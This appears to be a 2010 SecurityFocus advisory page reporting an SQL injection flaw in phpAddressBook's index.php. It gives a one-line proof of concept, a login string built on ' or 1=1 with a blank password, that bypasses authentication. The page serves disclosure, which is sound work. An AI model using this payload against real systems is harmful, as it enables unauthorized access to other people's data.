info
discussion
exploit
solution
references
phpAddressBook 'index.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof of concept is available:
login:admin ' or 1=1/*
password:[blank]
Privacy Statement
Copyright 2010, SecurityFocus